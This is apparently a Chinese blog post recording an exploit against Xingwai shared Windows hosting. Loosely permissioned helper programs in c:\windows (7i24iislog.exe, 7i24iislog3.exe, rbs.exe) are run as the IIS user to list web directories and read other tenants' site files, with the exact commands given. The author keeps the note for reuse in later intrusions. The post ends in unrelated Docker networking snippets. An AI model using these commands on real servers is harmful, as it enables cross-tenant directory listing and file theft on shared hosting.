最近遇到比較多的都是星外主機..各種蛋疼..
烏雲爆出的星外跨目錄讀取檔案這一漏洞給帶來了很多方便,所以在這記錄一下,方便以後參考使用.
詳細說明:
問題發生在以下檔案,這些檔案都沒有嚴格的設定執行許可權,當前的iis使用者能夠順利的利用它們執行命令:
c:\windows\7i24iislog.exe
c:\windows\7i24iislog2.exe
c:\windows\7i24iislog3.exe
c:\windows\7i24iislog4.exe
c:\windows\7i24tool.exe
c:\windows\rsb.exe
這些檔案貌似是星外處理日誌、設定許可權的
其中的7i24iislog.exe其實就是logparser,logparser是一款強大日誌分析工具,下面利用它來列web目錄:
c:\windows\7i24iislog "select top 100 path from e:\host\*.*" -i:fs -rtp:-1
返回如下:
讀取其中乙個站的目錄資訊:
c:\windows\7i24iislog "select top 100 path from e:\host\0233ab\*.*" -i:fs -rtp:-1
下面讀取檔案內容:
7i24iislog3.exe能夠打包iso檔案,利用它同樣的也可以列出目錄檔案資訊:
同樣的還有rbs.exe
c:\windows\rbs -r -v 024dbjj e:\host\0233ab\web\*.*
設定許可權
Docker跨主機通訊
已安裝zookeeper。這裡使用前面mesos裡的zookeeper配置 sudo vi etc default docker etc default docker內容 docker add opts h tcp h unix var run docker.sock cluster store z...
docker跨主機儲存
特點 實驗環境 oracle vm virtualbox虛擬機器 docker 192.168.2.100 docker1 192.168.2.200 curl ssl sh 建立配置檔案 add a service 虛擬機器軟體 endpoint 宿主機ip volume path 宿主機使用者路...
Docker 跨主機通訊
修改主機docker預設的虛擬網段,然後在各自主機上分別把對方的docker網段加入到路由表中,配合iptables即可實現docker容器誇主機通訊。配置方法如下 設有三颱虛擬機器 更改虛擬機器docker0網段,v1為172.17.1.1 24,v2為172.17.2.1 24,v3為172.1...